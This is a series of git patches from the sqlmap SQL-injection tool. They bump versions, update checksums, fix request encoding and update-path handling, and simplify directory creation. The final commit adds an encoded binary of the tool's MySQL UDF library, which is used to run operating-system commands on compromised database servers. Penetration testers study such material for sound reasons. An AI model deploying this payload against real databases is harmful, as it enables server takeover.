34d2fb1c8f0d0ea03b68d6c14d4f5ca7b5294333 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sat, 3 Mar 2018 00:01:26 +0100 Subject: [PATCH 046/428] Fixes #2957 --- lib/core/settings.py | 2 +- lib/request/connect.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index e6b2c979a6d..1aec86149e6 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.0" +VERSION = "1.2.3.1" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/connect.py b/lib/request/connect.py index 1c62fa3b040..c8c4109fe68 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -718,7 +718,7 @@ class _(dict): else: logger.debug(warnMsg) return Connect._retryProxy(**kwargs) - elif kb.testMode: + elif kb.testMode or kb.multiThreadMode: logger.critical(warnMsg) return None, None, None else: diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 61684682238..80aa3b138fa 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -ae4670ba5c8569d10ae0a55f2284f11e lib/core/settings.py +8f9ed47a90b8d4b1c11b7e94b3d2e75b lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py @@ -68,7 +68,7 @@ fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py 4e60fe7c94bbfa631087ed3426df8ef0 lib/request/basicauthhandler.py eb39d5cbd69a2238e2f4ea2fde183cdb lib/request/basic.py c0cabedead14b8a23353b606672cff42 lib/request/comparison.py -b3c3b71e9d4aeaa2ece681cabefc953d lib/request/connect.py +cbe4c7513501e8edbed9d5d3af9bdc1d lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py a1436e4e4f9b636cb8332f00b686bfd5 lib/request/httpshandler.py From a369f612072c5d0dd4a734d810b8489ad28148b4 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sat, 3 Mar 2018 00:27:21 +0100 Subject: [PATCH 047/428] Fixes #2956 --- lib/core/settings.py | 2 +- lib/core/update.py | 3 ++- txt/checksum.md5 | 4 ++-- 3 files changed, 5 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 1aec86149e6..cd02c1e8067 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.1" +VERSION = "1.2.3.2" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/core/update.py b/lib/core/update.py index fee57e8e41e..2da80dfd60d 100644 --- a/lib/core/update.py +++ b/lib/core/update.py @@ -20,6 +20,7 @@ from lib.core.revision import getRevisionNumber from lib.core.settings import GIT_REPOSITORY from lib.core.settings import IS_WIN +from lib.core.settings import UNICODE_ENCODING def update(): if not conf.updateAll: @@ -42,7 +43,7 @@ def update(): dataToStdout("\r[%s] [INFO] update in progress " % time.strftime("%X")) try: - process = subprocess.Popen("git checkout . && git pull %s HEAD" % GIT_REPOSITORY, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=paths.SQLMAP_ROOT_PATH.encode(locale.getpreferredencoding())) # Reference: http://blog.stastnarodina.com/honza-en/spot/python-unicodeencodeerror/ + process = subprocess.Popen("git checkout . && git pull %s HEAD" % GIT_REPOSITORY, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=paths.SQLMAP_ROOT_PATH.encode(sys.getfilesystemencoding() or UNICODE_ENCODING)) pollProcess(process, True) stdout, stderr = process.communicate() success = not process.returncode diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 80aa3b138fa..19311787a1c 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,14 +46,14 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -8f9ed47a90b8d4b1c11b7e94b3d2e75b lib/core/settings.py +a78fff3d9089addb212c284c87baaad4 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py 72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py de9922a29c71a235cb95a916ff925db2 lib/core/threads.py c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py -1c2e5a9a34d4778c336a3d66d86ad000 lib/core/update.py +755dc074f42ca8c73d1f2549a1cf09d1 lib/core/update.py fc624104ddb36d41794b7a943fde5f21 lib/core/wordlist.py 1e5532ede194ac9c083891c2f02bca93 lib/__init__.py 7620f1f4b8791e13c7184c06b5421754 lib/parse/banner.py From 8d6cc4ae2cb57a195e5fa6bc36fd0d3b8d25519a Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sat, 3 Mar 2018 00:50:47 +0100 Subject: [PATCH 048/428] Fixes #2959 --- lib/core/settings.py | 2 +- lib/core/update.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index cd02c1e8067..b55a209980a 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.2" +VERSION = "1.2.3.3" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/core/update.py b/lib/core/update.py index 2da80dfd60d..a411594002e 100644 --- a/lib/core/update.py +++ b/lib/core/update.py @@ -5,10 +5,10 @@ See the file 'LICENSE' for copying permission """ -import locale import os import re import subprocess +import sys import time from lib.core.common import dataToStdout diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 19311787a1c..dad4c152a5d 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,14 +46,14 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -a78fff3d9089addb212c284c87baaad4 lib/core/settings.py +2826b47bfd9c3157039f7de0dba235ab lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py 72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py de9922a29c71a235cb95a916ff925db2 lib/core/threads.py c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py -755dc074f42ca8c73d1f2549a1cf09d1 lib/core/update.py +063c10fb8261994fe1f8c8ace715aa76 lib/core/update.py fc624104ddb36d41794b7a943fde5f21 lib/core/wordlist.py 1e5532ede194ac9c083891c2f02bca93 lib/__init__.py 7620f1f4b8791e13c7184c06b5421754 lib/parse/banner.py From 76905e8728a03b1fabd0514fd15a3ca9108e8fc2 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 5 Mar 2018 10:53:24 +0100 Subject: [PATCH 049/428] Patch related to the #2953 --- lib/core/settings.py | 2 +- lib/request/connect.py | 6 ++++-- txt/checksum.md5 | 4 ++-- 3 files changed, 7 insertions(+), 5 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index b55a209980a..803276e9f61 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.3" +VERSION = "1.2.3.4" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/connect.py b/lib/request/connect.py index c8c4109fe68..19049bf31a7 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -861,7 +861,9 @@ def queryPage(value=None, place=None, content=False, getRatioValue=False, silent skip = True if not skip: - payload = urlencode(payload, '%', False, place != PLACE.URI) # spaceplus is handled down below + spaceplus = kb.postSpaceToPlus and place in (PLACE.POST, PLACE.CUSTOM_POST) + value = urlencode(value, spaceplus=spaceplus) + payload = urlencode(payload, safe='%', spaceplus=spaceplus) value = agent.replacePayload(value, payload) postUrlEncode = False @@ -1038,7 +1040,7 @@ def _randomizeParameter(paramString, randomParameter): name = safeVariableNaming(name) elif name in keywords: name = "%s%s" % (name, EVALCODE_KEYWORD_SUFFIX) - value = urldecode(value, convall=True, plusspace=(item==post and kb.postSpaceToPlus)) + value = urldecode(value, convall=True, spaceplus=(item==post and kb.postSpaceToPlus)) variables[name] = value if cookie: diff --git a/txt/checksum.md5 b/txt/checksum.md5 index dad4c152a5d..f0ce097f4b2 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -2826b47bfd9c3157039f7de0dba235ab lib/core/settings.py +9fde692b6fa94718d5fbe8f804e4edde lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py @@ -68,7 +68,7 @@ fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py 4e60fe7c94bbfa631087ed3426df8ef0 lib/request/basicauthhandler.py eb39d5cbd69a2238e2f4ea2fde183cdb lib/request/basic.py c0cabedead14b8a23353b606672cff42 lib/request/comparison.py -cbe4c7513501e8edbed9d5d3af9bdc1d lib/request/connect.py +6b70d287ed2508ffc66b37994d5ffca5 lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py a1436e4e4f9b636cb8332f00b686bfd5 lib/request/httpshandler.py From f95d0c831baab99add92ac8dcdb729da8b92ee5f Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 7 Mar 2018 14:34:38 +0100 Subject: [PATCH 050/428] Minor refactoring (already default mode in os.makedirs) --- lib/core/dump.py | 6 +++--- lib/core/settings.py | 2 +- lib/core/target.py | 8 ++++---- txt/checksum.md5 | 6 +++--- 4 files changed, 11 insertions(+), 11 deletions(-) diff --git a/lib/core/dump.py b/lib/core/dump.py index 33f68e63d91..b3e876c42aa 100644 --- a/lib/core/dump.py +++ b/lib/core/dump.py @@ -415,7 +415,7 @@ def dbTableValues(self, tableValues): elif conf.dumpFormat in (DUMP_FORMAT.CSV, DUMP_FORMAT.HTML): if not os.path.isdir(dumpDbPath): try: - os.makedirs(dumpDbPath, 0755) + os.makedirs(dumpDbPath) except: warnFile = True @@ -424,7 +424,7 @@ def dbTableValues(self, tableValues): if not os.path.isdir(dumpDbPath): try: - os.makedirs(dumpDbPath, 0755) + os.makedirs(dumpDbPath) except Exception, ex: try: tempDir = tempfile.mkdtemp(prefix="sqlmapdb") @@ -612,7 +612,7 @@ def dbTableValues(self, tableValues): mimetype = magic.from_buffer(value, mime=True) if any(mimetype.startswith(_) for _ in ("application", "image")): if not os.path.isdir(dumpDbPath): - os.makedirs(dumpDbPath, 0755) + os.makedirs(dumpDbPath) _ = re.sub(r"[^\w]", UNSAFE_DUMP_FILEPATH_REPLACEMENT, normalizeUnicode(unsafeSQLIdentificatorNaming(column))) filepath = os.path.join(dumpDbPath, "%s-%d.bin" % (_, randomInt(8))) diff --git a/lib/core/settings.py b/lib/core/settings.py index 803276e9f61..460c39fdf09 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.4" +VERSION = "1.2.3.5" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/core/target.py b/lib/core/target.py index 146f3de4737..d5ec2ccf92c 100644 --- a/lib/core/target.py +++ b/lib/core/target.py @@ -581,7 +581,7 @@ def _createFilesDir(): if not os.path.isdir(conf.filePath): try: - os.makedirs(conf.filePath, 0755) + os.makedirs(conf.filePath) except OSError, ex: tempDir = tempfile.mkdtemp(prefix="sqlmapfiles") warnMsg = "unable to create files directory " @@ -603,7 +603,7 @@ def _createDumpDir(): if not os.path.isdir(conf.dumpPath): try: - os.makedirs(conf.dumpPath, 0755) + os.makedirs(conf.dumpPath) except OSError, ex: tempDir = tempfile.mkdtemp(prefix="sqlmapdump") warnMsg = "unable to create dump directory " @@ -624,7 +624,7 @@ def _createTargetDirs(): try: if not os.path.isdir(paths.SQLMAP_OUTPUT_PATH): - os.makedirs(paths.SQLMAP_OUTPUT_PATH, 0755) + os.makedirs(paths.SQLMAP_OUTPUT_PATH) _ = os.path.join(paths.SQLMAP_OUTPUT_PATH, randomStr()) open(_, "w+b").close() @@ -654,7 +654,7 @@ def _createTargetDirs(): try: if not os.path.isdir(conf.outputPath): - os.makedirs(conf.outputPath, 0755) + os.makedirs(conf.outputPath) except (OSError, IOError, TypeError), ex: try: tempDir = tempfile.mkdtemp(prefix="sqlmapoutput") diff --git a/txt/checksum.md5 b/txt/checksum.md5 index f0ce097f4b2..a0df032453d 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -34,7 +34,7 @@ e3a3f5218b2e52dd0afafdfc9fed2002 lib/core/agent.py 12e80071013606f01822c3823fb51054 lib/core/decorators.py 9458679feb9184f3fb1611daf1ebef63 lib/core/defaults.py a8bea09096a42a9a7feeb9d4d118ae66 lib/core/dicts.py -0d742fbf72bca25a3e82640616c30c9a lib/core/dump.py +9ea8a043030796e6faef7f7e957729d5 lib/core/dump.py c8551f7696a76450e6d139409e4f06cd lib/core/enums.py cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py @@ -46,10 +46,10 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -9fde692b6fa94718d5fbe8f804e4edde lib/core/settings.py +4bb1c9ea37c92266776add390287cb39 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py -505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py +3cc852f927833895361973fbcfd156d2 lib/core/target.py 72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py de9922a29c71a235cb95a916ff925db2 lib/core/threads.py c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py From 4f2f31af674070d3764fe11046803df1bc33ef96 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 7 Mar 2018 15:43:42 +0100 Subject: [PATCH 051/428] Compiled 32-bit version for #2965 --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- udf/mysql/windows/32/lib_mysqludf_sys.dll_ | Bin 4309 -> 4477 bytes 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 460c39fdf09..f273f963504 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.5" +VERSION = "1.2.3.6" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index a0df032453d..d5e7df371a3 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -4bb1c9ea37c92266776add390287cb39 lib/core/settings.py +bcc364e787f34f4c3e65eb464ab6f8d6 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 3cc852f927833895361973fbcfd156d2 lib/core/target.py @@ -364,7 +364,7 @@ a44e7cf30f2189b2fbdb635b310cdc0c thirdparty/wininetpton/win_inet_pton.py 593473084228b63a12318d812e50f1e2 thirdparty/xdot/xdot.py 08c706478fad0acba049d0e32cbb6411 udf/mysql/linux/32/lib_mysqludf_sys.so_ 1501fa7150239b18acc0f4a9db2ebc0d udf/mysql/linux/64/lib_mysqludf_sys.so_ -7824059e8fc87c4a565e774676e2f1eb udf/mysql/windows/32/lib_mysqludf_sys.dll_ +ada861971f716ee1307b30e7de711b29 udf/mysql/windows/32/lib_mysqludf_sys.dll_ 7fed5b8e99e36ce255c64527ec61a995 udf/mysql/windows/64/lib_mysqludf_sys.dll_ 0ee1310d4e2a4cc5a7295df01a3a78bf udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_ c7d9e1fcac5f047edf17d79a825fb64b udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_ diff --git a/udf/mysql/windows/32/lib_mysqludf_sys.dll_ b/udf/mysql/windows/32/lib_mysqludf_sys.dll_ index ae438d63619bd09e27b0a68f7858db75f4017a23..9ad5063483a67ff509d63dd7ed18cd7f78e55596 100644 GIT binary patch literal 4477 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 Pzx$g0m$(0Z=M1pG<72!& literal 4309 zcmV;`5GwBnob4wDBP`dp-kC62Y+sc>XK{#tbslRzKR$1;f;pLsZ9Q!_Uwj!KxPYL3 zR5C6Tt*zF!1@#HA6|oh-;%`4b5hSlXG|@l7)+qvW;_!bu%-bF>M7;an{p0=!*YEcl z?X}jo_aOwIle33}*Xn<9e}IQin|>F2ENy=N5V?F#%lWG&;CuNbmpL>1w^252sbx|x zRtzeAMpbK9Yc+D3QaLImdQ~c*(W`7Oxh-4f(&=lr=}BR{gF17M8)i({;Sie+9W5jp zOEVShw2jFZf+a-mmkte*RL|H<=?I+W&7Rh*HoYlTlqcGo$(6TbfCqDNtQ}!DnDO;~ ztaNIFf53Yz$bH}qR@8cLm6L1cq+mo!K!3c@pb@&xD+kISzO1J!@fm+_H>lrxz&cOW z5klsV3??S^yxKsOz2$$z{XhpylFT&ool_gV$oIuxru&90eg*;0leUZi)?fy1kjE;i zD#B)AtapfS)&SsU|AlM+T>oKq;QCRtLjY(+W;BjMFJ=4WD5fGaO@Cr5XF7flc;KLB zib39Tc29;MOS3F3^%@bZLnZnq_<*}${!-@<`~@@S(TS#s)+qwCWQ~(Jvb7!R$LxK~ zy@PTS$AkO{jFU>p3qA|MXRWnCeK25FEs}ti!o;_JjK8r;iK6sosdDo&MVRdGjhF(@ zoo4S&zg^!Y5;NCbR;)>Lh73-n34F#A6;Hn&Y9rlw`-gs?rrTSl=t>dHuHwX)rh?J~tX_F0 z(;>T2RrQYBrJjjhHC%MG;WmFxXyBc9g{3YaS=zgv7+9vFN04jj0Zezv+nuqDy0Mro zg>(W?0=K;pfJvTC-v92x>#1!I03sM+rWyGx9h0`FJwU7=F%(>V05+TsE`UZmK?lzk zuilX_$IHW;wJ_&kzA4T^0vWeF0EG9`+PIC(hJp*g_=7ONDI|8()5@T^K4&&y^T3;d@uMiZAAscyCrL5k?hU%K*J7(LH zj~N*YvO$z`?IgyB$=@-ca5cr&}`-yoOEfRC)%g_p|kv?n&SH3HT_;RYqb${2%%L5B+NUv-&MIF^v{?FUFq1_W@Cw4Rz_AN)8Cz#r&(?W~@P>Yi`! zW9G(sb*2$>qd1sC`hp{pFz?DlAZ8= z!9lbl98|f3+h|EE*cDHw?!UI{2|!U8`TlxxmdwCdv=;Z%4qSmRs^)?(%NuBIwPHaE8cBet{Y zGm+Hn?~sZJ7@Kwi7?kV}gK_HFuw^wo`q?Eo zJOJFna-qcx^&-`##%wc_Q;~7`JZ?7V0#Z!G z+@7-4KeN5%&U0ecZwt>&_W$>9Da%5|ykpv9C@c=yYfU9nqkOZ?K5_ptXbH^@XeqFC zOwxrZL73m0^I1fgN7svpU7vccLor+6=Y0g34-fq5-tAN0Vpb7b{Nag)IG%8CEug-- z@9Ex;a;0X%f@#bFctq6ArWf0q#S;xUVCvupyb~AhwVLWt0Cm0u9Ib5-33QZ{^zJig zad+!nLZ1UT@wx)0)en5NJ?1w}L8Ro?4Fg(%LAbE38tcZK_8a7}9S6qNV$E1-38vp+ z1dUu{^e}f;_&)G1953k8I)~HsBQTF#m%qxoG3f*cbqF&--U5ra5B|s2-IOFYZl)6^ 